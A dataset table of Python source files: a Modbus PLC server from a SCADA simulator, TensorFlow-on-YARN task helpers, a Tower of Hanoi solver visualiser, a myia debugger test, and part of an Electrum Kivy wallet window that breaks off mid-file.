source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
async_plc.py
|
#!/usr/bin/env python
# SCADA Simulator
#
# Copyright 2018 Carnegie Mellon University. All Rights Reserved.
#
# NO WARRANTY. THIS CARNEGIE MELLON UNIVERSITY AND SOFTWARE ENGINEERING INSTITUTE MATERIAL IS FURNISHED ON AN "AS-IS" BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED, AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT.
#
# Released under a MIT (SEI)-style license, please see license.txt or contact permission@sei.cmu.edu for full terms.
#
# [DISTRIBUTION STATEMENT A] This material has been approved for public release and unlimited distribution. Please see Copyright notice for non-US Government use and distribution.
# This Software includes and/or makes use of the following Third-Party Software subject to its own license:
# 1. Packery (https://packery.metafizzy.co/license.html) Copyright 2018 metafizzy.
# 2. Bootstrap (https://getbootstrap.com/docs/4.0/about/license/) Copyright 2011-2018 Twitter, Inc. and Bootstrap Authors.
# 3. JIT/Spacetree (https://philogb.github.io/jit/demos.html) Copyright 2013 Sencha Labs.
# 4. html5shiv (https://github.com/aFarkas/html5shiv/blob/master/MIT%20and%20GPL2%20licenses.md) Copyright 2014 Alexander Farkas.
# 5. jquery (https://jquery.org/license/) Copyright 2018 jquery foundation.
# 6. CanvasJS (https://canvasjs.com/license/) Copyright 2018 fenopix.
# 7. Respond.js (https://github.com/scottjehl/Respond/blob/master/LICENSE-MIT) Copyright 2012 Scott Jehl.
# 8. Datatables (https://datatables.net/license/) Copyright 2007 SpryMedia.
# 9. jquery-bridget (https://github.com/desandro/jquery-bridget) Copyright 2018 David DeSandro.
# 10. Draggabilly (https://draggabilly.desandro.com/) Copyright 2018 David DeSandro.
# 11. Business Casual Bootstrap Theme (https://startbootstrap.com/template-overviews/business-casual/) Copyright 2013 Blackrock Digital LLC.
# 12. Glyphicons Fonts (https://www.glyphicons.com/license/) Copyright 2010 - 2018 GLYPHICONS.
# 13. Bootstrap Toggle (http://www.bootstraptoggle.com/) Copyright 2011-2014 Min Hur, The New York Times.
# DM18-1351
#
'''
Asynchronous PyModbus Server with Client Functionality
Used for SCADASim 2.0
'''
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.server.asynchronous import StartUdpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer, ModbusBinaryFramer
# --------------------------------------------------------------------------- #
# import the other libraries we need
# --------------------------------------------------------------------------- #
from datastore import *
from helper import *
from time import *
from threading import Thread
import logging, yaml
import sys, os, argparse
'''
@brief reads from backup, initializes the datastore, starts the backup thread and the register behavior threads, then starts the server
'''
def run_updating_server(config_list, backup_filename, log):
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
# Run datastore_backup_on_start to use the most recent values of the datablocks, as the layout in the master config will only reflect initial values
# If this is the first time this is used, the backup file will match up with what is laid out in the master config (due to master.py)
datastore_config = datastore_backup_on_start(backup_filename)
if datastore_config == -1:
print("Issue with backup file - either not created or empty. Exiting program.")
sys.exit()
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(datastore_config['di']['start_addr'], datastore_config['di']['values']),
co=ModbusSequentialDataBlock(datastore_config['co']['start_addr'], datastore_config['co']['values']),
hr=ModbusSequentialDataBlock(datastore_config['hr']['start_addr'], datastore_config['hr']['values']),
ir=ModbusSequentialDataBlock(datastore_config['ir']['start_addr'], datastore_config['ir']['values']))
# Could have multiple slaves, with their own addressing. Since we have 1 PLC device handled by every async_plc.py, it is not necessary
context = ModbusServerContext(slaves=store, single=True)
# setup a thread with target as datastore_backup_to_yaml to start here, before other threads
# this will continuously read from the context to write to a backup yaml file
backup_thread = Thread(target=datastore_backup_to_yaml, args=(context, backup_filename))
backup_thread.daemon = True
backup_thread.start()
# start register behaviors. Updating writer is started off, which will spawn a thread for every holding register based on the config
thread = Thread(target=updating_writer, args=(context, config_list, time, log, backup_filename))
thread.daemon = True
thread.start()
# Starting the server
server_config = config_list['SERVER']
framer = configure_server_framer(server_config)
if server_config['type'] == 'serial':
StartSerialServer(context, port=server_config['port'], framer=framer)
elif server_config['type'] == 'udp':
StartUdpServer(context, identity=identity, address=(server_config['address'], int(server_config['port'])))
elif server_config['type'] == 'tcp':
if server_config['framer'] == 'RTU':
StartTcpServer(context, identity=identity, address=(server_config['address'], int(server_config['port'])), framer=framer)
else:
StartTcpServer(context, address=(server_config['address'], int(server_config['port'])))
'''
@brief parse args, handle master config, setup logging, then call run_updating_server
'''
def main():
# --- BEGIN argparse handling ---
parser = argparse.ArgumentParser(description = "Main program for PLC device based off PyModbus")
parser.add_argument("--n", "--num_of_PLC", help = "The number of the PLC device")
parser.add_argument("--c", "--config_filename", help = "Name of the master config file")
args = parser.parse_args()
if args.n is None or args.c is None:
print("Need to run async_plc.py with --n and --c arguments. Run 'python async_plc.py --h' for help")
return
print( args )
num_of_PLC = args.n
master_config_filename = args.c
backup_filename = '/usr/local/bin/scadasim_pymodbus_plc/backups/backup_' + args.n + '.yaml'
# --- END argparse handling ---
stream = open(master_config_filename, 'r')
config_list = yaml.safe_load(stream)
stream.close()
# Only get the current PLC's configuration dictionary
config_list = config_list["PLC " + num_of_PLC]
# --- BEGIN LOGGING SETUP ---
FORMAT = config_list['LOGGING']['format']
# Add logic based on whether a file is used or stdout
# AND whether a format string is used or not
if config_list['LOGGING']['file'] == 'STDOUT':
if FORMAT == 'NONE':
logging.basicConfig()
else:
logging.basicConfig(format=FORMAT)
else:
if FORMAT == 'NONE':
logging.basicConfig(filename=config_list['LOGGING']['file'])
else:
logging.basicConfig(format=FORMAT, filename=config_list['LOGGING']['file'])
log = logging.getLogger()
configure_logging_level(config_list['LOGGING']['logging_level'], log)
# --- END LOGGING SETUP ---
run_updating_server(config_list, backup_filename, log)
if __name__ == "__main__":
main()
|
_task_commons.py
|
import json
import logging
import os
import re
import sys
from typing import List, Tuple, Dict, Optional, NamedTuple, Union
import cloudpickle
import skein
import tensorflow as tf
from tf_yarn import event, cluster, Experiment, constants, KerasExperiment
from tf_yarn._internal import MonitoredThread, iter_tasks
_logger = logging.getLogger(__name__)
def _log_sys_info() -> None:
_logger.info(f"Python {sys.version}")
_logger.info(f"Skein {skein.__version__}")
_logger.info(f"TensorFlow {tf.version.GIT_VERSION} {tf.version.VERSION}")
def _setup_container_logs(client):
task = cluster.get_task()
event.broadcast_container_start_time(client, task)
container = next(c for c in client.get_containers()
if c.yarn_container_id == os.environ["CONTAINER_ID"])
logs = container.yarn_container_logs
if logs is not None and not logs.startswith("http://"):
logs = "http://" + logs
event.logs_event(client, task, logs)
def _prepare_container(
host_port: Tuple[str, int]
) -> Tuple[skein.ApplicationClient, Dict[str, List[str]], List[str]]:
"""Keep socket open while preparing container """
client = skein.ApplicationClient.from_current()
_setup_container_logs(client)
cluster_tasks = _get_cluster_tasks(client)
cluster_spec = cluster.start_cluster(host_port, client, cluster_tasks)
return client, cluster_spec, cluster_tasks
def _get_cluster_tasks(
client: skein.ApplicationClient
) -> List[str]:
return list(iter_tasks(json.loads(client.kv.wait(constants.KV_CLUSTER_INSTANCES).decode())))
def _get_experiment(
client: skein.ApplicationClient
) -> NamedTuple:
try:
experiment = cloudpickle.loads(client.kv.wait(constants.KV_EXPERIMENT_FN))()
except Exception as e:
task = cluster.get_task()
event.start_event(client, task)
event.stop_event(client, task, e)
raise
return experiment
def _gen_monitored_train_and_evaluate(client: skein.ApplicationClient):
task = cluster.get_task()
def train_and_evaluate(
estimator: tf.estimator,
train_spec: tf.estimator.TrainSpec,
eval_spec: tf.estimator.EvalSpec):
event.broadcast_train_eval_start_timer(client, task)
tf.estimator.train_and_evaluate(
estimator,
train_spec,
eval_spec
)
event.broadcast_train_eval_stop_timer(client, task)
return train_and_evaluate
def _execute_dispatched_function(
client: skein.ApplicationClient,
experiment: Union[Experiment, KerasExperiment]
) -> MonitoredThread:
task_type, task_id = cluster.get_task_description()
_logger.info(f"Starting execution {task_type}:{task_id}")
if isinstance(experiment, Experiment):
thread = MonitoredThread(
name=f"{task_type}:{task_id}",
target=_gen_monitored_train_and_evaluate(client),
args=tuple(experiment),
daemon=True)
elif isinstance(experiment, KerasExperiment):
raise ValueError("KerasExperiment using parameter strategy is unsupported")
else:
raise ValueError("experiment must be an Experiment or a KerasExperiment")
thread.start()
task = cluster.get_task()
event.start_event(client, task)
return thread
def matches_device_filters(task: str, device_filters: List[str]):
task_type, task_id = task.split(":", 1)
for device_filter in device_filters:
[(filter_type, filter_id)] = re.findall(
r"^/job:([a-z]+)(?:/task:(\d+))?$",
# Remove once https://github.com/tensorflow/tensorflow/pull/22566 is released
device_filter.replace("master", "chief"))
if (filter_type == task_type and
(not filter_id or filter_id == task_id)):
return True
return not device_filters
def wait_for_connected_tasks(client, all_tasks, device_filters, message='stop'):
for task in all_tasks:
if matches_device_filters(task, device_filters):
event.wait(client, f"{task}/{message}")
def _shutdown_container(
client: skein.ApplicationClient,
cluster_tasks: List[str],
session_config: tf.compat.v1.ConfigProto,
thread: Optional[MonitoredThread]
) -> None:
# Wait for all tasks connected to this one. The set of tasks to
# wait for contains all tasks in the cluster, or the ones
# matching ``device_filters`` if set. The implementation assumes
# that ``device_filers`` are symmetric.
exception = thread.exception if thread is not None and isinstance(thread, MonitoredThread) \
else None
task = cluster.get_task()
event.stop_event(client, task, exception)
wait_for_connected_tasks(
client,
cluster_tasks,
getattr(session_config, "device_filters", []))
event.broadcast_container_stop_time(client, task)
if exception is not None:
raise exception from None
|
recursive_solver.py
|
from tree_viewer import TreeViewer
import Tkinter as tk
import threading
import time
NUM_DISKS = 3
Pole1 = '1'
Pole2 = '2'
Pole3 = '3'
BEGIN_QUEUE = [1,5]
MOVES = {}
MOVES[Pole1, Pole2] = [5,1,4,3,4,1,5,2,]
MOVES[Pole2, Pole1] = [3,5,1,4,2,4,1,5,]
MOVES[Pole1, Pole3] = [5,1,4,3,4,1,1,5,2,5,1,4,]
MOVES[Pole3, Pole1] = [4,1,5,3,5,1,1,4,2,4,1,5,]
MOVES[Pole3, Pole2] = [3,4,1,5,2,5,1,4,]
MOVES[Pole2, Pole3] = [4,1,5,3,5,1,4,2,]
END_QUEUE = [0,0,0,5,5,1]
class RecursiveSolver:
def __init__(self, viewer):
self.num_disks = NUM_DISKS
self.viewer = viewer
def move(self, frm, to):
return MOVES[frm, to]
def dohanoi(self, n, to, frm, using):
if n == 0: return []
level = self.num_disks - n
prefix = ''.join(['\t' for i in range(level)])
self.viewer.display_text(prefix + "At level {0} goal is to move {1} disks from pole {2} to pole {3}".format(level, n, frm, to))
self.viewer.user_pause('')
if n > 1:
self.viewer.display_text(prefix + "Decomposing the problem:")
self.viewer.display_text(prefix + "Move {0} disks from pole {1} to pole {2}".format(n-1, frm, using))
self.viewer.display_text(prefix + "Then move remaining disk from pole {0} to pole {1}".format(frm, to))
self.viewer.display_text(prefix + "Then move {0} disks from pole {1} to pole {2}".format(n-1, using, to))
subgoals = ['Move %s disks from %s to %s' % (n-1, frm, using),
'Move disk from %s to %s' % (frm, to),
'Move %s disks from %s to %s' % (n-1, using, to)]
self.viewer.add_item_viewer("Subgoals", subgoals, -1, [])
self.viewer.user_pause('')
self.viewer.set_active_index(0, level + 1)
self.viewer.display_text(prefix + "Recursing on first subgoal...")
self.viewer.user_pause('')
actions1 = self.dohanoi(n-1, using, frm, to)
self.viewer.add_completed_index(0, level + 1)
self.viewer.set_active_index(1, level + 1)
self.viewer.display_text(prefix + "Handling second subgoal...")
self.viewer.display_text(prefix + "Adding action: Move remaining disk from {0} to {1}".format(frm, to))
self.viewer.user_pause('')
actions2 = self.move(frm, to)
self.viewer.add_completed_index(1, level + 1)
self.viewer.set_active_index(2, level + 1)
self.viewer.display_text(prefix + "Recursing on third subgoal...")
self.viewer.user_pause('')
actions3 = self.dohanoi(n-1, to, using, frm)
self.viewer.add_completed_index(2, level + 1)
plan = actions1 + actions2 + actions3
#self.display_text(prefix + "Back at level {0}, the plan is [{1}]".format(level, ', '.join([str(x) for x in plan])))
self.viewer.display_text(prefix + "Subgoals are completed...")
self.viewer.user_pause('')
self.viewer.remove_last_item_viewer(level + 1)
return actions1 + actions2 + actions3
else:
self.viewer.display_text(prefix + "Entering base case...".format(frm, to))
self.viewer.display_text(prefix + "Adding action: Move single disk from {0} to {1}".format(frm, to))
actions2 = self.move(frm, to)
self.viewer.user_pause('')
return actions2
def solve(self):
time.sleep(0.1)
for a in self.queue_init():
continue
def queue_init(self):
self.viewer.add_item_viewer("Goal", ['Move %s disks from %s to %s' % (self.num_disks, Pole1, Pole3)], -1, [])
self.viewer.display_text('Starting to Solve!')
self.viewer.user_pause('')
self.viewer.set_active_index(0, 0)
actions = self.dohanoi(self.num_disks, Pole3, Pole1, Pole2)
self.viewer.add_completed_index(0, 0)
self.viewer.display_text('Problem Solved! Please click Execute Plan or close the window to continue!')
self.viewer.user_pause('')
return BEGIN_QUEUE + actions + END_QUEUE
def main():
root = tk.Tk()
root.title('Problem Decomposition')
viewer = TreeViewer(root)
solver = RecursiveSolver(viewer)
worker = threading.Thread(target=solver.solve)
worker.daemon = True
worker.start()
tk.mainloop()
worker.join()
if __name__ == "__main__":
main()
|
test_python_pdb.py
|
"""Test Python backend with option pdb=True.
It seems pytest-cov does not work well if PDB is imported during pytest runs.
To deal with it, code with PDB is executed in a separate process. This seems
enough to make coverage work again.
"""
import multiprocessing
import os
from myia import myia
def run_pdb(return_cell, *args):
# Myia-compiled function result will be saved in return_cell (shared list).
@myia(backend="python", backend_options={"debug": True, "pdb": True})
def f(a, b, c, d):
x = a ** b
y = x * c
z = x / d
return y + z + x
wd = os.getcwd()
# Change working directory to use local .pdbrc
os.chdir(os.path.dirname(__file__))
return_cell.append(f(*args))
# Back to previous working directory
os.chdir(wd)
def test_pdb():
manager = multiprocessing.Manager()
return_cell = manager.list()
p = multiprocessing.Process(
target=run_pdb, args=((return_cell, 1.0, 2.0, 3.0, 4.0))
)
p.start()
p.join()
assert return_cell[0] == 4.25
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum.util import PR_UNPAID, PR_PAID, PR_EXPIRED, PR_FAILED, PR_INFLIGHT
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.wallet import Abstract_Wallet
from electrum.plugin import Plugins
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.storage.put('use_change', self.use_change)
self.wallet.storage.write()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'tachacoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key, status):
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.request_popup = None
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('tachacoin:'):
self.set_URI(data)
return
if data.startswith('ln'):
self.set_ln_invoice(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
status = request['status']
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key)
self.request_popup.set_status(request['status'])
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
status = invoice['status']
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.set_status(status)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
